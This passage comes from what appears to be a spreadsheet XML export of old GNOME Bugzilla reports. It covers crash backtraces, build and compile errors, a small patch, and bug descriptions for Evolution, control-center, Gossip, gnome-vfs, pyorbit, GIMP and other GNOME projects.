#7  0xffffe410 in ?? ()
No symbol table info available.
#8  0x4250923c in ?? ()
No symbol table info available.
#9  0x00000006 in ?? ()
No symbol table info available.
#10 0x000036ac in ?? ()
No symbol table info available.
#11 0x411a7511 in raise () from /lib/tls/libc.so.6
No symbol table info available.
#12 0x411a8ce9 in abort () from /lib/tls/libc.so.6
No symbol table info available.
#13 0x4112dc25 in g_logv () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#14 0x4112dc62 in g_log () from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#15 0x41323d05 in camel_internet_address_encode_address
(inlen=0x42509864 
    real=0x84008c8 EddieE addr=0x0) at camel-internet-address.c:459
	name = 0x8444ce8 EddieE
	ret = 0x0
	len = 0
	out = (GString *) 0x80bcfbc
#16 0x41323394 in internet_encode (a=0x8434640) at
camel-internet-address.c:134
	addr = (struct _address *) 0x8445d60
	enc = 0x8445cb0 Â Ã”C\b\227Â©&amp;Ã®
	i = 0
	out = (GString *) 0x80bcf98
	ret = 0x42509898 Ãˆ\230PBVÃ2A@FC\bdÃ‰XAÃˆ\230PBfÃŽ2A\031a\002B\020
	len = 6
#17 0x4131a8e2 in camel_address_encode (a=0x8434640) at
camel-address.c:143
No locals.
#18 0x4132cf56 in camel_mime_message_set_from (msg=0x8433bd8
from=0x8400578)
    at camel-mime-message.c:359
	addr = 0x8445208 \001
#19 0x41a4335b in groupwise_folder_get_message (folder=0x842abd8 
    uid=0x842b1b8
42018E29.Provo1.Development.100.1366A37.1.5F.1@1:7.Provo1.Development.100.0.1.0.1@16
ex=0x8401888) at camel-groupwise-folder.c:292
	msg = (CamelMimeMessage *) 0x8433bd8
	gw_folder = (CamelGroupwiseFolder *) 0x842abd8
	gw_store = (CamelGroupwiseStore *) 0x81fb718
	priv = (CamelGroupwiseStorePrivate *) 0x81fbbd0
	mi = (CamelGroupwiseMessageInfo *) 0x8424450
	temp_name = 0x0
	folder_name = 0x84008d8 Mailbox
	container_id = 0x8422d08 7.Provo1.Development.100.0.1.0.1@16
	body = 0x83ff9b8 User not on post office\r\nError = D101
	from_addr = (CamelInternetAddress *) 0x8400578
	to_addr = (CamelInternetAddress *) 0x8400554
	cc_addr = (CamelInternetAddress *) 0x8434568
	bcc_addr = (CamelInternetAddress *) 0x8434664
	recipient_list = (GSList *) 0x0
	attach_list = (GSList *) 0x40f9cf09
	org = (EGwItemOrganizer *) 0x8434b50
	type = E_GW_ITEM_TYPE_MAIL
	status = E_GW_CONNECTION_STATUS_OK
	cnc = (EGwConnection *) 0x83ffc50
	item = (EGwItem *) 0x844ae48
	dtstring = 0x844b528 20050203T093625Z
	stream = (CamelStream *) 0x8435108
	cache_stream = (CamelStream *) 0x0
	multipart = (CamelMultipart *) 0x84355f0
	read_items = (GList *) 0x0
	item_status = 1095820960
#20 0x4152e422 in camel_folder_get_message (folder=0x842abd8 
    uid=0x842b1b8
42018E29.Provo1.Development.100.1366A37.1.5F.1@1:7.Provo1.Development.100.0.1.0.1@16
ex=0x8401888) at camel-folder.c:1039
	ret = (CamelMimeMessage *) 0x4152e382
#21 0x418135ec in get_message_get (mm=0x8401870) at mail-ops.c:1713
	m = (struct _get_message_msg *) 0x8401870
#22 0x4180ecad in mail_msg_received (e=0x81abf28 msg=0x8401870
data=0x0)
    at mail-mt.c:556
	m = (mail_msg_t *) 0x8401870
#23 0x401d8dfc in thread_received_msg (e=0x81abf28 m=0x8401870)
    at e-msgport.c:826
	func = 0x4180ebbb 
	func_data = (void *) 0x0
#24 0x401d8ffb in thread_dispatch (din=0x81abf28) at e-msgport.c:907
	e = (EThread *) 0x81abf28
	m = (EMsg *) 0x8401870
	info = (struct _thread_info *) 0x0
	self = 1112578992
#25 0x40f9ba13 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#26 0x412379da in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 2 (Thread 1114680240 (LWP 13999)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0x4270aa68 in ?? ()
No symbol table info available.
#2  0x00000001 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
#4  0x40f9d896 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/tls/libpthread.so.0
No symbol table info available.
#5  0x401d861e in e_msgport_wait (mp=0x81b2ee8) at e-msgport.c:511
	_buffer = {__routine = 0x401d8386  
  __arg = 0x81b2ee8 __canceltype = 138589752 __prev = 0x0}
	msg = (EMsg *) 0x0
#6  0x401d8f36 in thread_dispatch (din=0x81abfa0) at e-msgport.c:874
	e = (EThread *) 0x81abfa0
	m = (EMsg *) 0x0
	info = (struct _thread_info *) 0x0
	self = 1114680240
#7  0x40f9ba13 in start_thread () from /lib/tls/libpthread.so.0
No symbol table info available.
#8  0x412379da in clone () from /lib/tls/libc.so.6
No symbol table info available.
Thread 1 (Thread 1095028032 (LWP 13946)):
#0  0xffffe410 in ?? ()
No symbol table info available.
#1  0xbfffede8 in ?? ()
No symbol table info available.
#2  0x0008e32f in ?? ()
No symbol table info available.
#3  0x0000000e in ?? ()
No symbol table info available.
#4  0x4122e804 in poll () from /lib/tls/libc.so.6
No symbol table info available.
#5  0x41126558 in g_main_context_iterate ()
   from /opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x411277b7 in g_main_loop_run () from
/opt/gnome/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x408764d0 in bonobo_main () from /opt/gnome/lib/libbonobo-2.so.0
No symbol table info available.
#8  0x08065e50 in main (argc=1 argv=0xbffff094) at main.c:613
	options = {{longName = 0x806cbf9 component shortName = 99 'c' 
    argInfo = 1 arg = 0x806fb40 val = 0 
    descrip = 0x806cc04 Start Evolution activating the specified
component 
    argDescrip = 0x0} {longName = 0x806cc37 offline shortName = 0
'\0' 
    argInfo = 0 arg = 0x806fb2c val = 0 
    descrip = 0x806cc3f Start in offline mode argDescrip = 0x0} {
    longName = 0x806cc55 online shortName = 0 '\0' argInfo = 0 
    arg = 0x806fb28 val = 0 descrip = 0x806cc5c Start in online
mode 
    argDescrip = 0x0} {longName = 0x806cc71 force-shutdown 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fb34 val = 0 
    descrip = 0x806cc80 Forcibly shut down all Evolution components 
    argDescrip = 0x0} {longName = 0x806ccac force-migrate 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fb38 val = 0 
    descrip = 0x806ccbc Forcibly re-migrate from Evolution 1.4 
    argDescrip = 0x0} {longName = 0x806cce3 debug shortName = 0
'\0' 
    argInfo = 1 arg = 0x806fb44 val = 0 
    descrip = 0x806ccec Send the debugging output of all components to
a file. argDescrip = 0x0} {longName = 0x806cd23 disable-eplugin 
    shortName = 0 '\0' argInfo = 0 arg = 0x806fb3c val = 0 
    descrip = 0x806cd34 Disable loading of any plugins. argDescrip =
0x0} {
    longName = 0x806cd54 setup-only shortName = 0 '\0' 
    argInfo = 1073741824 arg = 0x806fb30 val = 0 descrip = 0x0 
    argDescrip = 0x0} {longName = 0x0 shortName = 0 '\0' argInfo = 0
    arg = 0x0 val = 0 descrip = 0x0 argDescrip = 0x0}}
	client = (GConfClient *) 0x809e970
	skip_warning_dialog = 1
	uri_list = (GSList *) 0x0
	popt_context_value = {g_type = 0 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long =
0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0
      v_pointer = 0x0}}}
	program = (GnomeProgram *) 0x8076fb8
	popt_context = 0x8079660
	args = (const char **) 0x0
	evolution_directory = 0x80ffca0 \v
	icon_list = (GList *) 0x80f98e8
#0  0xffffe410 in ?? ()
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-95453</t>
  </si>
  <si>
    <t>[obsolete] Window preferences</t>
  </si>
  <si>
    <t>Crash starting gnome-window-properties</t>
  </si>
  <si>
    <t xml:space="preserve">Package: control-center
Severity: normal
Version: GNOME2.1.0 2.1.0.2
Synopsis: Crash starting gnome-window-properties
Bugzilla-Product: control-center
Bugzilla-Component: Window preferences
BugBuddy-GnomeVersion: 2.0 (2.1.0)
Description:
Description of Problem:
Crash starting gnome-window-properties
Steps to produce the problem:
1. Select Applications &gt; Preferences &gt; Windows
2. Crash
Debugging Information:
Backtrace was generated from '/usr/bin/gnome-window-properties'
[New Thread 1024 (LWP 5866)]
0x420b48a9 in wait4 () from /lib/i686/libc.so.6
#0  0x420b48a9 in wait4 () from /lib/i686/libc.so.6
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x406ffca3 in waitpid () from /lib/i686/libpthread.so.0
#3  0x400993bd in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
#4  0x406fdf75 in pthread_sighandler () from /lib/i686/libpthread.so.0
#5  
#6  gnome_window_manager_get_name (wm=0x0) at gnome-window-manager.c:52
#7  0x0804b7e1 in wm_widget_add_wm (wm=0x0) at
gnome-window-properties.c:113
#8  0x0804b8d6 in update_gui () at gnome-window-properties.c:154
#9  0x0804bb35 in setup_dialog (dialog=0x809e738)
    at gnome-window-properties.c:245
#10 0x0804bcbb in main (argc=1 argv=0xbffffc44)
    at gnome-window-properties.c:291
#11 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6
Thread 1 (Thread 1024 (LWP 5866)):
#0  0x420b48a9 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4213030c in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x406ffca3 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x400993bd in libgnomeui_segv_handle (signum=11) at
gnome-ui-init.c:646
	estatus = 1081078878
	in_segv = 1
	pid = 0
#4  0x406fdf75 in pthread_sighandler () from /lib/i686/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  gnome_window_manager_get_name (wm=0x0) at gnome-window-manager.c:52
	wm = (GnomeWindowManager *) 0xfffffe00
#7  0x0804b7e1 in wm_widget_add_wm (wm=0x0) at
gnome-window-properties.c:113
	wm = (GnomeWindowManager *) 0x0
	menu_item = (GtkWidget *) 0x8058200
	row_text = 0xfffffe00 
#8  0x0804b8d6 in update_gui () at gnome-window-properties.c:154
	tmp_list = (GList *) 0x8058200
#9  0x0804bb35 in setup_dialog (dialog=0x809e738)
    at gnome-window-properties.c:245
	dialog = (GladeXML *) 0x809e738
#10 0x0804bcbb in main (argc=1 argv=0xbffffc44)
    at gnome-window-properties.c:291
	argc = 134759456
	argv = (char **) 0x809e738
	dialog = (GladeXML *) 0x809e738
	dialog_win = (GtkWidget *) 0x8084420
#11 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x420b48a9 in wait4 () from /lib/i686/libc.so.6
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-10-10 21:15 -------
Unknown version 1.0.x in product control-center. Setting version to the default unspecified.
Reassigning to the default owner of the component snickell@stanford.edu.
</t>
  </si>
  <si>
    <t>seth</t>
  </si>
  <si>
    <t>rodd</t>
  </si>
  <si>
    <t>GALEON-98971</t>
  </si>
  <si>
    <t>Downloads are aborted if you close last galeon window.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: normal
Version: CVS
Synopsis: Downloads are aborted if you close last galeon window.
Bugzilla-Product: galeon
Bugzilla-Component: general
Description:
Description of Problem:
If you have downloads going and you close the last galeon window the
downloads get aborted.
Steps to reproduce the problem:
1. Start a download.
2. Close galeon
Actual Results:
Downloads are aborted
Expected Results:
Downloads continue until completed.
How often does this happen?
everytime.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-11-19 01:32 -------
Reassigning to the default owner of the component galeon-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>F-SPOT-466946</t>
  </si>
  <si>
    <t>Operators do not work on localized versions</t>
  </si>
  <si>
    <t>Please describe the problem:
When using logical operators in localised for doing searches in the search bar (shift + /) the operators (that work correctly in the English version) stop working.
Only happens on localised versions
Steps to reproduce:
1. Press shift + / to get the search bar
2. Use a query that requires AND or OR operators
3. Nothing is given as result
Actual results:
Expected results:
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>jordimash</t>
  </si>
  <si>
    <t>JAVA-GNOME-334978</t>
  </si>
  <si>
    <t>LibGlade</t>
  </si>
  <si>
    <t>JAVA-GNOME</t>
  </si>
  <si>
    <t>Adding .lo .la  .class to the .cvsingore files</t>
  </si>
  <si>
    <t>I am suggesting that the files that are generated by an extarnal tool like the
compiler and that are not under CVS control should be ignored by CVS.
Other information:
A patch will follow.</t>
  </si>
  <si>
    <t>emmanuel.rodriguez</t>
  </si>
  <si>
    <t>GOSSIP-116418</t>
  </si>
  <si>
    <t>Crash when going Offline</t>
  </si>
  <si>
    <t>I selected Offline and bang!
Backtrace was generated from '/home/users/ross/bin/gnome2/bin/gossip'
[New Thread 16384 (LWP 24776)]
0x408e2a39 in wait4 () from /lib/libc.so.6
#0  0x408e2a39 in wait4 () from /lib/libc.so.6
#1  0x40955bc0 in sys_sigabbrev () from /lib/libc.so.6
#2  0x407a1061 in waitpid () from /lib/libpthread.so.0
#3  0x400859fa in libgnomeui_module_info_get () from /usr/lib/libgnomeui-2.so.0
#4  0x407a275a in __pthread_sighandler () from /lib/libpthread.so.0
#5  0x4086f898 in sigaction () from /lib/libc.so.6
#6  0x40822087 in g_vsnprintf () from /usr/lib/libglib-2.0.so.0
#7  0x4080544f in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#8  0x40806369 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#9  0x4080666f in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#10 0x40806cbe in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#11 0x40325d53 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#12 0x080514c0 in app_block_until_disconnected (app=0x80667b0) at
gossip-app.c:1241
#13 0x08051243 in app_set_status (app=0x80667b0 status=GOSSIP_STATUS_OFFLINE)
at gossip-app.c:1119
#14 0x4077b7dc in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
#15 0x4076b956 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#16 0x4077b406 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#17 0x4077a562 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#18 0x4077a75b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#19 0x403e3d5c in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
#20 0x40334589 in gtk_menu_shell_activate_item () from
/usr/lib/libgtk-x11-2.0.so.0
#21 0x40333942 in _gtk_menu_shell_activate () from /usr/lib/libgtk-x11-2.0.so.0
#22 0x4032de8b in gtk_menu_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
#23 0x403275d5 in _gtk_marshal_BOOLEAN__BOXED () from
/usr/lib/libgtk-x11-2.0.so.0
#24 0x4076bbf6 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
#25 0x4076b956 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#26 0x4077af0c in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
#27 0x4077a395 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#28 0x4077a75b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#29 0x403e3ba7 in gtk_widget_send_expose () from /usr/lib/libgtk-x11-2.0.so.0
#30 0x40327400 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#31 0x40326497 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#32 0x404b1242 in _gdk_events_queue () from /usr/lib/libgdk-x11-2.0.so.0
#33 0x4080544f in g_get_current_time () from /usr/lib/libglib-2.0.so.0
#34 0x40806369 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#35 0x4080666f in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#36 0x40806cbe in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#37 0x40325d53 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#38 0x0804edc5 in main (argc=1 argv=0xbffff534) at gossip-main.c:100
Thread 1 (Thread 16384 (LWP 24776)):
#0  0x408e2a39 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40955bc0 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0x407a1061 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x400859fa in libgnomeui_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x407a275a in __pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x4086f898 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x40822087 in g_vsnprintf () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x4080544f in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#8  0x40806369 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#9  0x4080666f in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x40806cbe in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#11 0x40325d53 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0x080514c0 in app_block_until_disconnected (app=0x80667b0) at
gossip-app.c:1241
	priv = (struct _GossipAppPriv *) 0x80b9490
#13 0x08051243 in app_set_status (app=0x80667b0 status=GOSSIP_STATUS_OFFLINE)
at gossip-app.c:1119
	priv = (struct _GossipAppPriv *) 0x80b9490
	m = (struct {...} *) 0x40791928
	data = (struct {...} *) 0x80fa3a0
#14 0x4077b7dc in g_cclosure_marshal_VOID__VOID () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x4076b956 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x4077b406 in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0x4077a562 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x4077a75b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x403e3d5c in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x40334589 in gtk_menu_shell_activate_item () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x40333942 in _gtk_menu_shell_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x4032de8b in gtk_menu_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x403275d5 in _gtk_marshal_BOOLEAN__BOXED () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#24 0x4076bbf6 in g_cclosure_new_swap () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x4076b956 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x4077af0c in g_signal_emit_by_name () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x4077a395 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x4077a75b in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#29 0x403e3ba7 in gtk_widget_send_expose () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0x40327400 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x40326497 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x404b1242 in _gdk_events_queue () from /usr/lib/libgdk-x11-2.0.so.0
No symbol table info available.
#33 0x4080544f in g_get_current_time () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#34 0x40806369 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#35 0x4080666f in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#36 0x40806cbe in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#37 0x40325d53 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0x0804edc5 in main (argc=1 argv=0xbffff534) at gossip-main.c:100
	app = (struct _GossipApp *) 0x15
	program = (struct _GnomeProgram *) 0x15
	no_connect = 0
	popt_context = (struct poptContext_s *) 0x8067918
	options = {{longName = 0x805a360 no-connect shortName = 97 'a' argInfo
= 0
arg = 0xbffff48c 
    val = 0 descrip = 0x805a36b Don't connect on startup. argDescrip =
0x0}
{longName = 0x0 
    shortName = 0 '\0' argInfo = 0 arg = 0x0 val = 0 descrip = 0x0
argDescrip = 0x0}}
#0  0x408e2a39 in wait4 () from /lib/libc.so.6</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-471700</t>
  </si>
  <si>
    <t>gnome-terminal has an unlocalized license text.</t>
  </si>
  <si>
    <t>gnome-terminal has an unlocalized license text due to no gettext. I think it's better to have the localized text since other modules have done.
To reproduce:
1. Invoke gnome-terminal.
2. Choose [Help] -&gt; [About] and launch the about dialog.
3. Click [License] button and launch [License] dialog.
Then the license text is not localized.
I'm attaching the patch.</t>
  </si>
  <si>
    <t>tfujiwar</t>
  </si>
  <si>
    <t>JHBUILD-116757</t>
  </si>
  <si>
    <t>gnome-terminal should depend on libstartup-notification-1.0</t>
  </si>
  <si>
    <t>[jhbuild from CVS as of Jul 04]
It looks like a dependency deeds to be added between gnome-terminal and
libstartupnotification-1.0:
checking for IceConnectionNumber in -lICE... yes
checking for pkg-config... /usr/bin/pkg-config
checking for gtk+-2.0 &gt;= 2.2.0 gconf-2.0 &gt;= 1.1.9 libglade-2.0
libgnomeui-2.0 libstartup-notification-1.0 &gt;= 0.4 vte &gt;= 0.11.0... Package
libstartup-notification-1.0 was not found in the pkg-config search path.
Perhaps you should add the directory containing
`libstartup-notification-1.0.pc'
to the PKG_CONFIG_PATH environment variable
No package 'libstartup-notification-1.0' found
configure: error: Library requirements (gtk+-2.0 &gt;= 2.2.0 gconf-2.0 &gt;=
1.1.9 libglade-2.0 libgnomeui-2.0 libstartup-notification-1.0 &gt;= 0.4 vte &gt;=
0.11.0) not met consider adjusting the PKG_CONFIG_PATH environment
variable if your libraries are in a nonstandard prefix so pkg-config can
find them.
*** error during stage configure of gnome-terminal: could not configure
module *** [35/82]</t>
  </si>
  <si>
    <t>andre.bugs2</t>
  </si>
  <si>
    <t>GNOME-MEDIA-73750</t>
  </si>
  <si>
    <t>File missing from gnome-media POTFILES.in</t>
  </si>
  <si>
    <t>When I run intltool-update -M in the po directory I get:
---
The following files contain translations and are currently not in use. Please
consider adding these to the POTFILES.in file located in the po/ directory.
gnome-cd/access/cddisplayaccessible.c
If some of these files are left out on purpose then please add them to
POTFILES.skip instead of POTFILES.in. A file 'missing' containing this list
of left out files has been written in the current directory.
---</t>
  </si>
  <si>
    <t>BANSHEE-414505</t>
  </si>
  <si>
    <t>FIXMEed recursive FindSource() in MiniMode SourceModel</t>
  </si>
  <si>
    <t>This patch addresses a FIXME in the MiniMode plugin's SourceModel.cs file regarding recursion of the FindSource() function. I also tweaked the AddSource() methods to better handle the fact that Sources can now have children which are not ChildSources. This is essentially the same FindSource() function in SourceView.cs (only the column id used in GetValue() differs). This code really ought to be re-jiggered so it isn't duplicated.</t>
  </si>
  <si>
    <t>lunchtimemama</t>
  </si>
  <si>
    <t>LDTP-334512</t>
  </si>
  <si>
    <t>ldtp can not deal with the name included '&amp;'</t>
  </si>
  <si>
    <t>Steps:
bash-3.00$ python
Python 2.4.2 (#1 Feb 15 2006 21:11:16) [C] on sunos5
Type help copyright credits or license for more information.
&gt;&gt;&gt; from ldtp import *
&gt;&gt;&gt; waittillguinotexist ('dlgSend&amp;ReceiveMail')
waittillguinotexist ( dlgSend&amp;ReceiveMail )
Entity: line 1: parser error : EntityRef: expecting ''
TION&gt;waittillguinotexist1021593305dlgSend&amp;ReceiveMail
Workaround is 'dlgSend*'</t>
  </si>
  <si>
    <t>patrick.gu</t>
  </si>
  <si>
    <t>RHYTHMBOX-328047</t>
  </si>
  <si>
    <t>Add GTK category to the .desktop file</t>
  </si>
  <si>
    <t>The .desktop file should have GNOMEGTK instead of GNOME in it's Categories according to the standard:
  http://standards.freedesktop.org/menu-spec/latest/apa.html</t>
  </si>
  <si>
    <t>GNET-118023</t>
  </si>
  <si>
    <t>GNET</t>
  </si>
  <si>
    <t>gnet_gethostbyname() broken on Solaris 7</t>
  </si>
  <si>
    <t>The implementation of gnet_gethostbyname() with
HAVE_GETHOSTBYNAME_R_SOLARIS defined assumes that
gethostbyname_r() returns the errno rather than
a struct hostent pointer.  I've made a patch for
this and confirmed that it works (even when ERANGE
is returned and GNet needs to grow the buffer) on
Solaris 7.</t>
  </si>
  <si>
    <t>dhelder</t>
  </si>
  <si>
    <t>GNOME-VFS-147374</t>
  </si>
  <si>
    <t>Compilation fails if lib kerberos5 absent for ftp module</t>
  </si>
  <si>
    <t>The modules/ftp-module.c compilations fails with the following error :
ftp-method.c: In function `ftp_connection_destroy':
ftp-method.c:1384: error: structure has no member named `gcontext'
ftp-method.c:1385: error: `gss_qop_t' undeclared (first use in this function)
ftp-method.c:1385: error: (Each undeclared identifier is reported only once
ftp-method.c:1385: error: for each function it appears in.)
ftp-method.c:1385: error: parse error before maj_stat
ftp-method.c:1386: error: `gss_buffer_desc' undeclared (first use in this function)
ftp-method.c:1388: error: `maj_stat' undeclared (first use in this function)
ftp-method.c:1388: warning: implicit declaration of function
`gss_delete_sec_context'
ftp-method.c:1388: error: `min_stat' undeclared (first use in this function)
ftp-method.c:1389: error: structure has no member named `gcontext'
ftp-method.c:1390: error: `output_tok' undeclared (first use in this function)
ftp-method.c:1392: error: `GSS_S_COMPLETE' undeclared (first use in this function)
ftp-method.c:1393: warning: implicit declaration of function `gss_release_buffer'
ftp-method.c:1395: error: structure has no member named `gcontext'
Looking above the gcontext member is only available when HAVE_GSSAPI is defined
but the same test doesn't exist in the function provoking the error when
HAVE_GSSAPI is not defined.
I don't know how to fix it since I don't know the kerberos lib at all but I
though I could report it :)
Cheers.</t>
  </si>
  <si>
    <t>PYORBIT-118990</t>
  </si>
  <si>
    <t>PYORBIT</t>
  </si>
  <si>
    <t>pyorbit segfault when demarshalling exceptions</t>
  </si>
  <si>
    <t>This happens with Python 2.3 and gnome 2.3.x.  Whenever an exception
occurs pyorbit crashes:
/home/garbage/cvs/gnome2/cvs/gnome-python/pyorbit/tests
[emperor:tests]$ python everything_client.py
.......TypeError: descriptor '__init__' for '' objects doesn't apply to
'instance' object
Segmentation fault (core dumped)
  Obviously some memory corruption somewhere.  It used to work fine with
Python 2.2.x.
  The exception is printed because of the following changes:
Index: src/pycorba-marshal.c
===================================================================
RCS file: /cvs/gnome/gnome-python/pyorbit/src/pycorba-marshal.cv
retrieving revision 1.26
diff -u -p -r1.26 pycorba-marshal.c
--- src/pycorba-marshal.c       14 Jul 2003 12:39:08 -0000      1.26
+++ src/pycorba-marshal.c       3 Aug 2003 11:19:15 -0000
@@ -4636 +46310 @@ demarshal_value(CORBA_TypeCode tc gcons
                stub = pyorbit_exception
        }
        instance = PyObject_CallFunction(stub ())
+       if (PyErr_Occurred()) {
+           PyErr_Print()
+           return NULL
+       }
        if (stub == pyorbit_exception) {
            PyObject *pytc = pycorba_typecode_new(tc)
PS: there is no 'pyorbit' module or component in bugzilla!</t>
  </si>
  <si>
    <t>python-bindings-maint</t>
  </si>
  <si>
    <t>MEDUSA-41336</t>
  </si>
  <si>
    <t>Search Daemon</t>
  </si>
  <si>
    <t>MEDUSA</t>
  </si>
  <si>
    <t>Define search:// uri meanings</t>
  </si>
  <si>
    <t xml:space="preserve">
------- Additional Comments From rebecka@eazel.com 2000-06-13 16:50:32 ----
Define the syntax for specifying search criterion.
(perhaps use oaf as a model?)
------- Additional Comments From rebecka@eazel.com 2000-06-22 12:15:58 ----
Uris within the uris must be doubly encoded.
------- Additional Comments From eli@eazel.com 2000-10-16 12:32:18 ----
Batch assigning Josh as the Quality Engineering contaact for Medusa bugs.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
Bug blocks bug(s) 41337.
</t>
  </si>
  <si>
    <t>GIMP-321692</t>
  </si>
  <si>
    <t>plugin filters-&gt;distort-&gt;curve_bend fails when calling depricated gimp-rotate</t>
  </si>
  <si>
    <t>Open an image. Select Filters-&gt;Distorts-&gt;Curve_bend. Check Automatic preview.
Enter a Rotate value. The following error will popup:
GIMP Message
WARNING: Plug-In curve_bend
(/usr/local/gimp-2.3.5/lib/gimp/2.0/plug-ins/curve_bend)
called deprecated procedure 'gimp-rotate'.
It should call 'gimp-drawable-transform-rotate-default' instead!
I tried to replace gimp-rotate in curve_bend.c with the new procedure but it
then complained about argument 2 being GIMP_PDB_INT32 but expecting
GIMP_PDB_FLOAT. Tried to correct that and it complained about arg #3 - I got
lost after that so could not figure out the fix - sorry.</t>
  </si>
  <si>
    <t>bonzo</t>
  </si>
  <si>
    <t>EVOLUTION-201556</t>
  </si>
  <si>
    <t>threaded view doesn't show all messages</t>
  </si>
  <si>
    <t>I've got a folder that has 5 new messages in it.  When using non-threaded view
these messages appear when using threaded view they don't.  I've copied the
#summary file from it as it stands right now but I'm not sure if that will be
helpful.</t>
  </si>
  <si>
    <t>BANSHEE-524355</t>
  </si>
  <si>
